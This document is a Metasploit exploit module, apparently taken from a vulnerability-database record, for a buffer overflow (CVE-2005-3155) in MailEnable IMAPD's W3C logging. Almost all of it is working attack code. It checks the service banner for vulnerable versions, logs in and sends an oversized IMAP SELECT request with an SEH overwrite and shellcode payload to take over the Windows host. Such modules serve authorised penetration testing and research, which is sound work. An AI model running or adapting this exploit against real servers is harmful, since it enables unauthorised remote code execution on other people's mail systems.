https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::Imap\n include Msf::Exploit::Remote::Seh\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'MailEnable IMAPD W3C Logging Buffer Overflow',\n 'Description' => %q{\n This module exploits a buffer overflow in the W3C logging\n functionality of the MailEnable IMAPD service. Logging is\n not enabled by default and this exploit requires a valid\n username and password to exploit the flaw. MailEnable\n Professional version 1.6 and prior and MailEnable Enterprise\n version 1.1 and prior are affected.\n },\n 'Author' => [ 'MC' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2005-3155'],\n [ 'OSVDB', '19842'],\n [ 'BID', '15006'],\n ],\n 'Privileged' => true,\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread',\n },\n 'Payload' =>\n {\n 'Space' => 600,\n 'BadChars' => \"\\x00\\x0a\\x0d\\x20\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n ['MailEnable 1.54 Pro Universal', { 'Ret' => 0x1001c019 } ] #MEAISP.DLL\n ],\n 'DisclosureDate' => 'Oct 03 2005',\n 'DefaultTarget' => 0))\n end\n\n def check\n connect\n disconnect\n\n if (banner and banner =~ /MailEnable Service, Version: 0-1\\.54/)\n return Exploit::CheckCode::Appears\n end\n return Exploit::CheckCode::Safe\n end\n\n def exploit\n connect_login\n\n buf = rand_text_alphanumeric(6196, payload_badchars)\n seh = generate_seh_payload(target.ret)\n req = 'a01 SELECT ' + buf + seh + \"\\r\\n\"\n sock.put(req)\n\n handler\n disconnect\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/imap/mailenable_w3c_select.rb"}]}
